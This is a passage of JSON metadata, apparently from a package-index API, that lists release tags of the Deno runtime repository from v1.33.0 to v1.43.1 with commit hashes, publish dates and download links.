oland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed